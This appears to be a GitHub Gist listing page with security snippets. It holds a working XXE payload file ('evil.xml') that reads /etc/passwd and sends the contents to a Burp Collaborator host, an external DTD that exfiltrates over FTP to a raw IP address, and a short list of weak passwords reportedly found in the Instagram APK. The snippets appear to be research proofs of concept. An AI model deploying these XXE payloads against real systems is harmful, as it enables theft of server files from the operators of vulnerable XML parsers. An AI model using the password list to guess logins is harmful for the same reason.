Skip to content

Instantly share code, notes, and snippets.

@nahamsec
nahamsec / evil.xml
Last active September 9, 2024 15:13
<!ENTITY % xxePOC SYSTEM "file:///etc/passwd">
<!ENTITY % exfildata "<!ENTITY &#x25; exfil SYSTEM 'http://7u2bvf9vu78d9wepre2c3qmg87e82x.burpcollaborator.net/?x=%xxePOC;'>">
%exfildata;
%exfil;
@nahamsec
nahamsec / xxe.dtd
Last active September 9, 2024 15:13
<!ENTITY % d SYSTEM "https://138.68.23.180:443">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://138.68.23.180:443/%d;'>">
@hexabin
hexabin / ShittyInstagramPasswords.txt
Created September 1, 2017 17:29
Bad Passwords in the Instagram APK
summer
112233445566
121212
iloveu
654321
lovelove
hello123
asdfghjkl
chicken
1234512345